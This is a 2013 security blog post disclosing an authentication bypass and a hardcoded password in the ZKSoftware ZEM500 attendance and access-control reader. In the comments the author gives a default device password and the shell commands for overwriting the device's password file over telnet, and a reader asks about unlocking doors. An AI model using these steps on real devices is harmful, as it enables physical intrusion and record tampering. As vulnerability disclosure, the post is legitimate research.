Thursday, November 21, 2013

ZKSoftware ZEM500 Authentication Bypass


############################################
# ZKSoftware ZEM500 RFID Card Reader
# Date: 22.11.2013
# Vuln: Authentication bypass / Abuse of Access
###########################################

In a world which relies on technology heavily, the use of software and/or hardware to track people at office / work isn't new. It is actually quite old and a lot of systems are vulnerable. This is just my observation of ZEM500 hardware on a limited scope of attack.

Typical connectivity diagram from the ZEM500 Hardware to the network...


ZEM500 by ZKSoftware (Sold by ESSL India) is a biometric fingerprint cum smart card system to authenticate and maintain user attendance in corporate offices. The authentication (employee name, employee password) is encoded in a smart card like any other system. The ZEM500 runs a Linux kernel 2.4x. The device runs busybox linux and its based on fingerprinting.

Port Scan of the ZEM 500,















Telnet to ZEM 500,













Malformed packet for ZEM500 using Scapy,














Observing the traffic with Wireshark was not amusing and revealed employee login / log out details... For obvious reasons of confidentiality and safety, I won't post it online!

eSSL Time Track - Hardcoded Password,











Apart from the above mentioned authentication bypass, you can download a copy at www.esslindia.com/install/eTimeTrack.zip  to manage the software like a normal administrator would. eSSL resells the hardware in India. The management software has a hardcoded password for Windows and SQL Authentication. Weak Encryption, anyone?

Default install includes SQL Express for the management software. The software can be used to manage, maintain and fetch reports from the system.

The ZEM500 has WiFi capability and I never hooked my system to the firewire... Food for thought? ;))

Cheers,
Kish

8 comments:

Mookie said...

What is the default telnet name and login for the ZEM500?

kishfellow said...

Please understand the nature of bug doesn't require you to authenticate.

That's why it is called "bypass"

Cheers!

Anonymous said...

Hi your work is so amazing !

I'm an IT guy in a company which uses this ZK fingerprint machine, I'm tired of printing this 'timesheet' record every week, because the layout style it provides is so old and outdated. As I know some web development and some linux/database knowledge, I want to hook directly up to the ZEM500 SQL and read SQL from there, so that I may develop some useful and modern clock-management 'software', what should I do? Since none in our company except me is monitoring this thing( we use that software it provides, yes), how can I get the password and username to that busy box linux? Thanks a lot !

htlcnn said...

I don't understand what the bypass is after reading your post. Could you please give more details? Thanks!

Guendelman said...



But any way What is the default telnet name and login for the Device ?
From Chile Claudio

Scarlet Pimpernel said...

I didn't realize something I did for fun, would generate interest... But here goes,

All you have to do is telnet in to the box, issue a passwd command, change the password and copy it to overwrite, /mnt/mtdblock and /mnt/mtdblock/data

# passwd
(Once you get the password changed use the following commands)
# cp /etc/passwd /mnt/mtdblock
# cp /etc/passwd /mnt/mtdblock/data/

Default password for the device, that I ahem explored, was solokey, IIRC.

I am NOT very sure or updated on the vulnerability as such. It may have been reported and fixed by now (I saw THIS in 2013) - I could be wrong, too... Since some vendors don't fix the vulnerabilities quickly.

Sorry about the late reply. All of the above were gleaned from my notes in 2013...

Always document the vulnerabilities you play with for later use... :)

Cheers,
Kish

Mookie said...

We have a couple of these units for building access. I can telnet into the boxes, but I would really like to script a terminal command that I could send to either device to unlock a door without having to open the GUI and peck around. Any ideas?

Scarlet Pimpernel said...

Beyond the obvious snooping around, I am NOT inclined to post a PoC exploit as such. You can try your hand with bash scripting or python with a packet crafting tool like scapy to send UDP packets (while monitoring with wireshark), alternately check if there's a public exploit for the device.

Cheers!